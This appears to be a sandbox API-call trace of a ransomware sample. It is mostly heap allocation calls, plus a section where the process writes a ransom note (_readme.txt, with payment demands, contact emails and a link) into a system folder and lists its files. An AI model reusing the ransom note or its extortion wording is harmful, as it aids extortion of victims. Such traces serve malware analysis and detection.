[0173.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.814] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0173.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.814] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.814] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.814] PathFindFileNameW (pszPath="") returned="" [0173.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.814] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.814] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.815] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8d2f0 [0173.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.815] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3a8d2f0 [0173.815] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0173.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.815] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0173.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.815] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.815] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.815] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.816] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.816] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.817] CloseHandle (hObject=0x690) returned 1 [0173.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.817] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e62fe60, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e62fe60, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.817] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e62fe60, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e62fe60, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.818] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.818] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e62fe60, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e62fe60, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e62fe60, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.818] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e62fe60, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e62fe60, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e62fe60, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.818] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.818] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.818] 